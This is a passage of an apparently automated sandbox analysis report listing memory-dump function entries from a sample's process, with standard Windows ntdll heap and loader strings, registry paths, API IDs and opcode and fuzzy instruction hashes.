                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                      • API String ID: 0-3178619729
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                      • API String ID: 0-379654539
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                      • API String ID: 2994545307-2586055223
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • minkernel\ntdll\ldrinit.c, xrefs: 0180A908
                                      • LdrpDynamicShimModule, xrefs: 0180A8FE
                                      • apphelp.dll, xrefs: 017C23B2
                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A8F8
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: $ $0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • HEAP: , xrefs: 017A14F6
                                      • HEAP[%wZ]: , xrefs: 017A1672
                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 017A1688
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: FilterFullPath$UseFilter$\??\
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • TargetNtPath, xrefs: 0187B4EF
                                      • GlobalizationUserSettings, xrefs: 0187B4F4
                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0187B4EA
                                      Similarity
                                      • API ID:
                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0180A4EF
                                      • minkernel\ntdll\ldrmap.c, xrefs: 0180A500
                                      • LdrpCompleteMapModule, xrefs: 0180A4F6
                                      Similarity
                                      • API ID:
                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0182B302
                                      • GlobalFlag, xrefs: 0182B35F
                                      • @, xrefs: 0182B340
                                      Similarity
                                      • API ID:
                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • BuildLabEx, xrefs: 017E12CF
                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 017E123B
                                      • @, xrefs: 017E1265
                                      Similarity
                                      • API ID:
                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: `$`
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: Legacy$UEFI
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA25B
                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA269
                                      Similarity
                                      • API ID:
                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: .Local\$@
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • RtlpInitializeAssemblyStorageMap, xrefs: 01812976
                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0181297B
                                      Similarity
                                      • API ID:
                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: BinaryHash
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182861E
                                      Similarity
                                      • API ID:
                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 551ec327f40c3cbe00f8f87ea1650926697406c8e0fc7572e4bed1ce1ed84291
                                      • Instruction ID: 2839d3b9f7adde1791a383119bde9439e4cb671b5e7e0c70defd2e7c2244b007
                                      • Opcode Fuzzy Hash: 551ec327f40c3cbe00f8f87ea1650926697406c8e0fc7572e4bed1ce1ed84291
                                      • Instruction Fuzzy Hash: 9CC1B271A011258BDB25CF1DC8D4BFAFBA1FF44B04F294199EA429B396E734DA41CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 661dc6df43ce95418bbdab7fe85ff14e7c5c86ffcdf5f5513fd4887557f51f68
                                      • Instruction ID: b04aaa5338a1e281b952893cdea064381b2881769cd3739bcab46ffdb7d86db6
                                      • Opcode Fuzzy Hash: 661dc6df43ce95418bbdab7fe85ff14e7c5c86ffcdf5f5513fd4887557f51f68
                                      • Instruction Fuzzy Hash: ACA16F7150020AAFEB139F98CC99FAEBBB8EF55714F004158FA00AB2A4D775DD51CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb858c55d83a997dfb8fc4cff317ea6e942f8a82e2559fbf98dea156c0a970d8
                                      • Instruction ID: d082db57a408af316a73ac734e3ae4e1bcfefaadeddc1cc0fe2ffce25242d8d3
                                      • Opcode Fuzzy Hash: cb858c55d83a997dfb8fc4cff317ea6e942f8a82e2559fbf98dea156c0a970d8
                                      • Instruction Fuzzy Hash: A9C14A701083458FE765CF19C894BABF7E4BF88304F544A6DE98987291D774EA48CF92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81db1ff5c8b165ccc521ab04976858479d0d7527a7a08c360b341879f829aae4
                                      • Instruction ID: 0d3e8c5f0ae25b84a04f5f3b1d597ac2594da4846517c049b7334da105af3488
                                      • Opcode Fuzzy Hash: 81db1ff5c8b165ccc521ab04976858479d0d7527a7a08c360b341879f829aae4
                                      • Instruction Fuzzy Hash: 2AB18F70A002568BDF65DF58D890BAAF7F1EF44700F1485EAD50AEB395EB309E85CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d09221e68935d96d88198370db98dbaa5b317ef158e57a7b84ccc49007beeb92
                                      • Instruction ID: b43a27db1f00d0cddda551bbc85f3103fde75657d944b582883385911d570b04
                                      • Opcode Fuzzy Hash: d09221e68935d96d88198370db98dbaa5b317ef158e57a7b84ccc49007beeb92
                                      • Instruction Fuzzy Hash: 19A1E631E006599FEB32DB9CC858BADBFA4AF04B14F154169EA11FB2D1DB749E40CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5b27d31c7e6775a8083926086feb639b3b4586c122b228ad1a36c28d21ba8a7
                                      • Instruction ID: 04de2f706fdbcdd0502a5d129dae41e104eb0ef623a06cfbec35ce0a4e2ba6a2
                                      • Opcode Fuzzy Hash: e5b27d31c7e6775a8083926086feb639b3b4586c122b228ad1a36c28d21ba8a7
                                      • Instruction Fuzzy Hash: 09A1BE71B006069FDB25CF69C998BAAB7E5FF58318F004029F905E7285EBB4A911CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19ebf872ca2f03118b1dd8fc15505d015576d16feb749ed5d556b345e3df7862
                                      • Instruction ID: 4d9cd3f0ce26b4850ade2bd342dbefc153f8f1b0ba7eabf0126e10ea7ab1f01a
                                      • Opcode Fuzzy Hash: 19ebf872ca2f03118b1dd8fc15505d015576d16feb749ed5d556b345e3df7862
                                      • Instruction Fuzzy Hash: 98A1ED72604612EFC722DF28C984B6ABBE9FF48704F150928F58ADB655D334EE41CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e11c607cd897c7960b798cac8cc11a1f3701e09042a8302a6c532cc2f1a3bc13
                                      • Instruction ID: 56e4bb987d05462820edad8a831cf4cd50bd579d880ba7cac6197f9b1f73b249
                                      • Opcode Fuzzy Hash: e11c607cd897c7960b798cac8cc11a1f3701e09042a8302a6c532cc2f1a3bc13
                                      • Instruction Fuzzy Hash: 8B912731E01616CBDB259B58C8C4BFEFBA1EF94714F1540A9F906DB386EB389A01C791
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 65f9e2aa894e6b3299e4f83b6fba93883e1ab71a7ba55a836372b4c382c806f9
                                      • Instruction ID: aca022b2020bdb4682a6ef42b69016038d8c1a05777ce0d68040c28d09b74000
                                      • Opcode Fuzzy Hash: 65f9e2aa894e6b3299e4f83b6fba93883e1ab71a7ba55a836372b4c382c806f9
                                      • Instruction Fuzzy Hash: 91B100756093418FE754CF28C480A6BFBE1BF88304F584A6EE9998B352D731E945CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a57cbb4214e8c6c9e466692c8708b6b837f7063b4ecdca36fec5fc55fc96c99
                                      • Instruction ID: 7d724fb365262e7bdd1c6439f5a767896b1999d0c75db132202f8915d754b1d2
                                      • Opcode Fuzzy Hash: 1a57cbb4214e8c6c9e466692c8708b6b837f7063b4ecdca36fec5fc55fc96c99
                                      • Instruction Fuzzy Hash: D2B18CB1900306CFDB25CF1CD5897A9BBF0BB84318FA84299DA619B296D730D952CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 27e60e516d35ec9047a7fb3c4e54e30fa303ae2a0bcf9aafb2fe7f39f4503b97
                                      • Instruction ID: f1a3c8578cb364701075d2b35c00a0fce559eecc2137f7aafaca3a1102fa332f
                                      • Opcode Fuzzy Hash: 27e60e516d35ec9047a7fb3c4e54e30fa303ae2a0bcf9aafb2fe7f39f4503b97
                                      • Instruction Fuzzy Hash: AC719E35A0021A9BDFA0CE59C4C0ABEBBE7EF64750F14415AED00EB242E334DA51C7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e33ae5e7d2962dcb5f4ae1db20d0a2722080139baba9afaa81d494fe43de0e48
                                      • Instruction ID: cd2f0ba0c208232febdd84e2b08416194a6fbbfe2a440bb489d6674e87afc932
                                      • Opcode Fuzzy Hash: e33ae5e7d2962dcb5f4ae1db20d0a2722080139baba9afaa81d494fe43de0e48
                                      • Instruction Fuzzy Hash: 34815D71A00609AFDB12CFA9C880AEEFBFAFF48354F144429E556E7214DB30A945DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c00ee78811443b6230d3755850a30117fa47f258ed213ea6ec8c12e8f7a5112
                                      • Instruction ID: 2c0f7f141a07f63d5114d1e36b3f9e9acbc6187b53a99adca5557971e2bf64e4
                                      • Opcode Fuzzy Hash: 1c00ee78811443b6230d3755850a30117fa47f258ed213ea6ec8c12e8f7a5112
                                      • Instruction Fuzzy Hash: AA71A071D056299BCB26CF58C890BFEFBB5FF49714F14815AE842A7390E7309A41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aecba8f4d72d4b426105bf0eac62dc5fcfce782479f21b543c7261bf07e3ed21
                                      • Instruction ID: 825c96a6d17331e93997658209d8c2a6b587c6f77004c0f439fe1af8c6954d4e
                                      • Opcode Fuzzy Hash: aecba8f4d72d4b426105bf0eac62dc5fcfce782479f21b543c7261bf07e3ed21
                                      • Instruction Fuzzy Hash: D871D1316052428FD712DF2CC884B6AF7E5FF88304F1485AAE855CB796EB34E945CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e4390e14878a9c603aeb1a8018c444fe200b5ffe4b47456f235e7577342de1b
                                      • Instruction ID: 9abd467d313e56e5edbff5d54fba8814926d289c76acfe875b76c0f1236b064f
                                      • Opcode Fuzzy Hash: 2e4390e14878a9c603aeb1a8018c444fe200b5ffe4b47456f235e7577342de1b
                                      • Instruction Fuzzy Hash: C3715C71A0061AEFDB11DFA9C984BEEBBB9FF88300F104569E505E7254DB34EA45CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0d58152ccddf490b7ec1dd625fe610b492789548457f017bb3a474dab613f62b
                                      • Instruction ID: d0d32775b45474a28e5a54271f319d582c2ec1a1fd562a73355ed5a683c6fe9c
                                      • Opcode Fuzzy Hash: 0d58152ccddf490b7ec1dd625fe610b492789548457f017bb3a474dab613f62b
                                      • Instruction Fuzzy Hash: 485108B22042469FD730EF68C988F6BB7ECEB94724F14062DF91197199DB30DA01CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f20a3560937bb3fd5b15d9b934e4503af2184314a15abec014ec288fe58e57e
                                      • Instruction ID: e5ac4481f4df04ed921e17c2170770048afd7ef73ba095ed58c32c7eecb4af35
                                      • Opcode Fuzzy Hash: 4f20a3560937bb3fd5b15d9b934e4503af2184314a15abec014ec288fe58e57e
                                      • Instruction Fuzzy Hash: D44123716006019FDF269F29E985F6BFBA8FF44710F15446EEA09DB255D770A840CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2d35b2e29a58e616ed55006bf3fbfdb2d23c42d6105eea802c452ef4e6b22af2
                                      • Instruction ID: eecbc75611ff87368afb0c397f30eaed744737f1c7690c0fa7272caab8a167df
                                      • Opcode Fuzzy Hash: 2d35b2e29a58e616ed55006bf3fbfdb2d23c42d6105eea802c452ef4e6b22af2
                                      • Instruction Fuzzy Hash: 9551AB7190060DAAEF629FE4CC95BEDFBF8FF15704F20012EA690A7196DB719A40DB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6b57ca65b0ddcb0dd408fb21b04044cdb50f73ba1692fb50cf81fa800a5a892f
                                      • Instruction ID: 1bf281fda1d0556d52bdc72070732cd9bc1a4af4a5240ecc3a867488fbe4e93a
                                      • Opcode Fuzzy Hash: 6b57ca65b0ddcb0dd408fb21b04044cdb50f73ba1692fb50cf81fa800a5a892f
                                      • Instruction Fuzzy Hash: 0251E230A0060AEFDB1ADB68CC4876EF7F5BF84325F144269D512D3290EB74EA01CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 191a54b94049edab8bae514f61745f9a9e51e7498e7670db3c58f29478cb5baf
                                      • Instruction ID: 5ca9b3569a09c9b0a7355ac9a2cd9ee2325eb15ad3686b34b42aa0ef8599c99b
                                      • Opcode Fuzzy Hash: 191a54b94049edab8bae514f61745f9a9e51e7498e7670db3c58f29478cb5baf
                                      • Instruction Fuzzy Hash: 25516E71E0061AABDF15CF98C854BEEFBB9AF44B14F14406DEA02BB344D774DA448BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8eb74727f9bd907256d315948a58631db474b75f5fe37672ad30ddf28de83056
                                      • Instruction ID: 9f610c8fabe5d4c3ba2a166ddde3a292eb2848248c4f6b546a349eba5cade420
                                      • Opcode Fuzzy Hash: 8eb74727f9bd907256d315948a58631db474b75f5fe37672ad30ddf28de83056
                                      • Instruction Fuzzy Hash: F951AFB1A05209DFEF22DBA8C844BEDF7B5BB98354FA40258F911EB281D774A9408B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19a3f97ab95e2a439d92950485c6c41ce376fef62f17ae4ec1633a2378c99eab
                                      • Instruction ID: 1ac557fd08e1df76edb216379caf5902950a92635d1cceeafe8e6bea9bd1832f
                                      • Opcode Fuzzy Hash: 19a3f97ab95e2a439d92950485c6c41ce376fef62f17ae4ec1633a2378c99eab
                                      • Instruction Fuzzy Hash: 7A519F71600606EFDB16CF14C584A56FBF5FF55308F1481AAE908DF212E771EA86CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 28166189ab14e246a8ca1198a438b3dcb2cdfec4fa03ddd01cb99e64f8f570c2
                                      • Instruction ID: 2e6c22edbf0cea3fc30a6b0db641b0bf7436c8bd4081946a49630bd07aa09b9f
                                      • Opcode Fuzzy Hash: 28166189ab14e246a8ca1198a438b3dcb2cdfec4fa03ddd01cb99e64f8f570c2
                                      • Instruction Fuzzy Hash: F451D670940106DBDB26CB28CC54BE9FBB1FF55314F5883A9E119A72D2E734AA81CF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f234f477f8233d381f42d93524dda60d1c0a88ff3894efd6ba3e47a6af7abe54
                                      • Instruction ID: b2dd336b5f08fe6c04dc11f599e793e5045eede8d30399e1a3b4f1b0f60bc1b4
                                      • Opcode Fuzzy Hash: f234f477f8233d381f42d93524dda60d1c0a88ff3894efd6ba3e47a6af7abe54
                                      • Instruction Fuzzy Hash: 54418FB0640606EFDB22AF69E884F6BFBA8EF50754F044469E601CB295E770D944CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c1a3ad3a181cf001a64175be87df968e7f68b632ef1ef33af84e51d0fc59335a
                                      • Instruction ID: 7d638329e974abe350bd2e0804a9bf3639abbef31826569f05d4bf0986772b10
                                      • Opcode Fuzzy Hash: c1a3ad3a181cf001a64175be87df968e7f68b632ef1ef33af84e51d0fc59335a
                                      • Instruction Fuzzy Hash: 72418071B00316ABDB15DF9DC984AAFBBBEAF89710F144069A908E7351DA70DF4087A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f982a0537ecaf5ebb0fe56e313042a09fb4b560f54ecdcdec7d2900ea089082
                                      • Instruction ID: d9cdf823cae1f45bc06c0286d5184748e245ef3b5bc8e1f789521dc67f965839
                                      • Opcode Fuzzy Hash: 8f982a0537ecaf5ebb0fe56e313042a09fb4b560f54ecdcdec7d2900ea089082
                                      • Instruction Fuzzy Hash: F441BE32A01609CFDB22CF6CD9987EAFBB0FB18B15F18019DD411A7295EB349A41CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
